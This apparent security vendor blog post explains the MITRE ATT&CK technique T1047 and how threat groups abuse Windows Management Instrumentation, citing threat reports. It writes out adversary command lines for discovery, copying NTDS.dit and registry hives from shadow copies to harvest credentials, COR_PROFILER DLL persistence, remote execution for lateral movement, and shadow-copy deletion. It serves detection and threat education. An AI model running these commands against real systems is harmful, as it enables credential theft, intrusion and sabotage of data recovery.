T1047 Windows Management Instrumentation of the MITRE ATT&CK Framework

Windows Management Instrumentation (WMI) is the infrastructure for managing data and operations on Windows operating systems. The extensive capabilities of WMI greatly help administrators maintain large networks. However, adversaries also use the versatility of WMI to execute malicious commands and payloads in compromised Windows hosts. In this blog, we explain one of the most used execution techniques that give adversaries numerous ways to interact with the Windows hosts, T1047 Windows Management Instrumentation.

The Red Report 2023
The 10 Most Prevalent MITRE ATT&CK Techniques Used by Adversaries

MITRE ATT&CK T1047 Windows Management Instrumentation

Windows Management Instrumentation (WMI) is a built-in administration feature and is available in the default configuration of Windows operating systems. The WMI has been around since Windows NT, and the WMI command line (WMIC) was the main way to interact with WMI until Windows 10 version 21H1. Since WMIC was available for so long, adversaries commonly used WMIC in attack campaigns. Although PowerShell supersedes WMIC for WMI in the latest Windows versions, many hosts worldwide still run on older versions of Windows, and malicious payloads that use WMIC are still used in the wild.

The MITRE ATT&CK framework does not list any sub-techniques for the T1047 Windows Management Instrumentation technique. However, adversaries abuse the WMI infrastructure's broad access to many operating system functions for command execution, defense evasion, discovery, and lateral movement.

Adversary Use of Windows Management Instrumentation

1. System and Information Discovery

PowerShell's Get-WmiObject cmdlet can be used to obtain information about WMI classes from local or remote hosts. Adversaries use the Get-WmiObject cmdlet to gather information about compromised hosts or other hosts in a compromised network.

Get-WmiObject Win32_OperatingSystem
Get-WmiObject Win32_NetworkAdapterConfiguration -Filter "IPEnabled=True"
Get-WmiObject Win32_ComputerSystem
Get-WmiObject -Namespace "root\cimv2" -Class AntiVirusProduct -ComputerName DC

For example, the Iranian APT group MuddyWater uses the PowerShell cmdlets above to interact with WMI to collect the following information about the infected hosts [1]:

Operating system
IP address
Host name
Network adapter configuration
Domain name
User name
Computer name
List of installed Antivirus products

Adversaries can access information about WMI classes using various methods. All three examples below return the same information. Organizations should take into account these methods when configuring their detective security controls.

wmic OS get SystemDirectory,Organization,BuildNumber,RegisteredUser,SerialNumber,Version
Get-WmiObject win32_operatingsystem | Format-List
Get-CimInstance Win32_OperatingSystem | Format-List

2. Credential Harvesting and Privilege Escalation

Volume shadow copies contain OS files and user files as a backup for data restoration. WMI allows users with the required privileges to manage volume shadow copies. Adversaries abuse this feature to create a copy of the root directory and steal NTDS.dit, SYSTEM, and SECURITY files from the copy. These files are used by the Windows operating system to store domain credentials, and adversaries use the following commands to exfiltrate NTDS.dit, SYSTEM, and SECURITY files. Then, adversaries extract credentials from these files and gain access to privileged accounts [2].

//creating volume shadow copy

wmic /node:"[AD_IP_address]" /user:"[username]" /password:"[password]" process call create "cmd /c vssadmin create shadow /for=C: 2>&1"

//copying NTDS.dit, SYSTEM and SECURITY files from shadow copy
wmic /node:"[AD_IP_address]" /user:"[username]" /password:"[password]" process call create "cmd /c copy \[shadow_copy_dir]\Windows\NTDS\NTDS.dit [target_folder] & copy \[shadow_copy_dir]\Windows\System32\config\SYSTEM [target_folder] & copy \[shadow_copy_dir]\Windows\System32\config\SECURITY [target_folder]"

//compressing files for exfiltration
7za.exe a -mx3 nt.7z \\[AD_IP_address]\c$\[target_folder]

3. Establishing Persistence

COR_PROFILER is an environment variable that allows developers to specify an unmanaged or external profile DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). For a simpler explanation, if COR_ENABLE_PROFILING is set to 1, the DLL pointed by the COR_PROFILER is loaded whenever a process loads the CLR.

Adversaries abuse this feature to execute their malicious DLLs and establish persistence in the infected host. For example, Blue Mockingbird cryptominer malware uses the following commands to manipulate COR_PROFILER to point to their payload DLL. Whenever a process calls the CLR, the infected host loads the pointed DLL and re-establishes persistence [3].

//deleting existing COR_PROFILER variable

wmic ENVIRONMENT where "name='COR_PROFILER'" delete

//creating COR_ENABLE_PROFILING variable and setting it to 1
wmic ENVIRONMENT create name="COR_ENABLE_PROFILING",username="<system>",VariableValue="1"

//creating a new COR_PROFILER variable

wmic ENVIRONMENT create name="COR_PROFILER",username="<system>",VariableValue="<arbitrary CLSID>"

//adding registry keys for malicious DLL

reg.exe add HKLM\Software\Classes\CLSID\<arbitrary CLSID>\InProcServer32 /V ThreadingModel /T REG_SZ /D Apartment /F

reg.exe add HKLM\Software\Classes\CLSID\<arbitrary CLSID>\InProcServer32 /VE /T REG_SZ /D "<malicious_DLL>" /F

4. Lateral Movement

WMI allows users with the required privileges to execute commands in remote hosts without additional tools. Adversaries abuse this feature to move laterally in a compromised network. Adversaries used the following commands to execute commands in a remote host:

wmic /node:<remote_host's_IP> /user:<username> /password:<password> process call create cmd.exe /c "<command>"

powershell -c Invoke-WMIMethod -class Win32_Process -Name Create -ArgumentList "cmd /c <command>" -ComputerName <remote_host's_name>

For example, Conti ransomware deploys a Cobalt Strike beacon using WMI and rundll32 in a remote host using the following command. After deployment, adversaries established an RDP session with the remote host [4].

wmic /node:<remote_host's_IP> process call create "rundll32.exe C:/ProgramData/<malicious_dll> DllRegisterServer"

5. Impact

As mentioned previously, WMI allows users to manage volume shadow copies. Some organizations use these copies to recover their system and data after a ransomware attack. Ransomware threat actors abuse WMI to delete volume shadow copies and limit their victim's ability to recover encrypted data. This method has become a common practice among ransomware operators as it immensely enhances the attack's impact. The Hive ransomware group uses the following command to delete shadow copies using WMI [5].

wmic shadowcopy delete /nointeractive

References

[1] "Iranian Government-Sponsored Actors Conduct Cyber Operations Against Global Government and Commercial Networks." https://www.cisa.gov/uscert/ncas/alerts/aa22-055a

[2] "THREAT ANALYSIS REPORT: Bumblebee Loader – The High Road to Enterprise Domain Control." https://www.cybereason.com/blog/threat-analysis-report-bumblebee-loader-the-high-road-to-enterprise-domain-control

[3] T. Lambert, "Blue Mockingbird activity mines Monero cryptocurrency," Red Canary, May 07, 2020. https://redcanary.com/blog/blue-mockingbird-cryptominer/

[4] "CONTInuing the Bazar Ransomware Story," The DFIR Report, Nov. 29, 2021. https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/

[5] S. Ozeren, "CISA Alert AA22-321A: Hive Ransomware Analysis, Simulation, TTPs & IOCs," Dec. 12, 2022. https://www.picussecurity.com/resource/blog/cisa-alert-aa22-321a-hive-ransomware-analysis-simulation-ttps-iocs

What Is Continuous Threat Exposure Management (CTEM)?

What Is Detection Rule Validation (DRV) ?